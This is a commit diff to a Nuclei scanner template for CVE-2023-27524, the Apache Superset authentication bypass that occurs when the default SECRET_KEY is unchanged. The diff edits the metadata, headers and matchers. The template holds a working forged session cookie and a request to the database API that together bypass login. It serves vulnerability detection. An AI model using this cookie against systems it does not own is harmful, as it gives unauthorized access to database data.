updated matcher

cves/2023/CVE-2023-27524.yaml

@@ -1,7 +1,7 @@
 id: CVE-2023-27524
 
 info:
-  name: Apache Superset Auth Bypass
+  name: Apache Superset - Authentication Bypass
   author: DhiyaneshDK
   severity: high
   description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
@@ -18,21 +18,16 @@ info:
     shodan-query: html:"Apache Superset"
   tags: cve,cve2023,apache,superset,auth-bypass
 
-http:
+requests:
   - raw:
       - |
         GET /login/ HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
-        Accept-Encoding: gzip, deflate
         Accept: */*
 
       - |
         GET /api/v1/database/1 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
-        Accept-Encoding: gzip, deflate
-        Accept: */*
         Cookie: session=eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEfQPg.Enz83rUqMAFfdCds7ClQzlEmScg
 
     matchers-condition: and
@@ -41,6 +36,8 @@ http:
         part: body
         words:
           - '"database_name":'
+          - '"configuration_method":'
+        condition: and
 
       - type: status
         status: